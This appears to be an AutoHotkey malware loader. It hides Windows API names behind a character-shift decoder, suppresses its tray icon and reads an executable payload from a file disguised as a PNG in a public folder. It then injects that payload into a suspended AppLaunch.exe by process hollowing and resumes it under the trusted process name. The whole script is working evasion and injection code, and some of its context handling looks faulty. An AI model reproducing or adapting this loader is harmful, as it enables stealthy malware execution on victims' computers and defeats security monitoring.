#NoEnv
#NoTrayIcon





__decode(str) {
    out := ""
    len := StrLen(str)
    loop % len {
        ch := SubStr(str, A_Index, 1)
        out .= Chr(Asc(ch) - 3)
    }
    return out
}


LaunchPackedEXE(dummyHost, payloadArray) {
    ptr := __decode("swu")
    i32 := __decode("lqw")
    i16 := __decode("vkruw")
    i64 := __decode("lqw97")

    pCreate := __decode("FuhdwhSurfhvv")
    pGetCtx := __decode("JhwWkuhdgFrqwh{w")
    pGetCtx64 := __decode("Zrz97JhwWkuhdgFrqwh{w")
    pRead := __decode("UhdgSurfhvvPhpru|")
    pFree := __decode("qwgoo2]zXqpdsYlhzRiVhfwlrq")
    pAlloc := __decode("YluwxdoDoorfH{")
    pWrite := __decode("ZulwhSurfhvvPhpru|")
    pMove := __decode("UwoPryhPhpru|")
    pSetCtx := __decode("VhwWkuhdgFrqwh{w")
    pSetCtx64 := __decode("Zrz97VhwWkuhdgFrqwh{w")
    pResume := __decode("UhvxphWkuhdg")
    pClose := __decode("ForvhKdqgoh")

    len := payloadArray.Length()
    VarSetCapacity(peData, len)
    Loop % len {
        NumPut(payloadArray[A_Index], &peData, A_Index - 1, "UChar")
    }

    VarSetCapacity(sInfo, 104, 0)
    VarSetCapacity(pInfo, 24, 0)
    NumPut(104, sInfo, 0, i32)
    NumPut(0x1, sInfo, 44, i32)
    NumPut(1, sInfo, 48, i16)

    if !DllCall(pCreate, "Str", dummyHost, i32, 0, i32, 0, i32, 0, i32, 0, i32, 4, i32, 0, i32, 0, ptr, &sInfo, ptr, &pInfo) {
        ExitApp
    }
 
    hProc := NumGet(pInfo, 0, ptr)
    hThread := NumGet(pInfo, 8, ptr)
    imageOffset := NumGet(&peData, 0x3C, i32)
    imageBase := NumGet(&peData, imageOffset + 0x34, i32)

    ctxSize := 0xB3 * 4
    VarSetCapacity(ctx, ctxSize, 0)
    NumPut(0x10002, ctx, 0, i32)

    if (A_PtrSize = 4)
        DllCall(pGetCtx, ptr, hThread, ptr, &ctx)
    else
        DllCall(pGetCtx64, ptr, hThread, ptr, &ctx)

    ebx := NumGet(ctx, 0x29 * 4, i32)

    baseAddr := 0
    VarSetCapacity(tmp, 4, 0)
    DllCall(pRead, ptr, hProc, ptr, ebx + 8, ptr, &baseAddr, i32, 4, ptr, &tmp)

    if (imageBase == baseAddr)
        DllCall(pFree, ptr, hProc, ptr, baseAddr)

    imgSize := NumGet(&peData, imageOffset + 0x50, i32)
    hdrSize := NumGet(&peData, imageOffset + 0x54, i32)

    newBase := DllCall(pAlloc, ptr, hProc, i32, imageBase, i32, imgSize, i32, 0x3000, i32, 0x40)

    DllCall(pWrite, ptr, hProc, i32, newBase, ptr, &peData, i32, hdrSize, i32, &tmp)

    sect := imageOffset + 0xF8
    count := NumGet(&peData, imageOffset + 6, i16)

    Loop %count% {
        va := NumGet(&peData, sect + 0xC, i32)
        sz := NumGet(&peData, sect + 0x10, i32)
        off := NumGet(&peData, sect + 0x14, i32)
        if (sz > 0) {
            VarSetCapacity(tmpSect, sz)
            DllCall(pMove, ptr, &tmpSect, ptr, &peData + off, ptr, sz)
            DllCall(pWrite, ptr, hProc, i32, newBase + va, ptr, &tmpSect, i32, sz, i32, &tmp)
        }
        sect += 0x28
    }

    ptrSize := (A_PtrSize = 4) ? 4 : 8
    VarSetCapacity(ptrBuf, ptrSize)
    NumPut(newBase, ptrBuf, 0, (ptrSize = 4) ? i32 : i64)
    DllCall(pWrite, ptr, hProc, i32, ebx + 8, ptr, &ptrBuf, i32, 4, i32, &tmp)

    entry := NumGet(&peData, imageOffset + 0x28, i32)
    NumPut(0x2C, ctx, newBase + entry, i32)

    if (A_PtrSize = 4)
        DllCall(pSetCtx, ptr, hThread, ptr, &ctx)
    else
        DllCall(pSetCtx64, ptr, hThread, ptr, &ctx)

    DllCall(pResume, ptr, hThread)
    DllCall(pClose, ptr, hThread)
    DllCall(pClose, ptr, hProc)
}


payloadPath := "C:\Users\Public\a2026.png"
FileRead, raw, %payloadPath%
segments := StrSplit(raw, ",")
arr := []

Loop % segments.MaxIndex()
    arr.Push(Ceil(segments[A_Index] * 2))


LaunchPackedEXE("C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe", arr)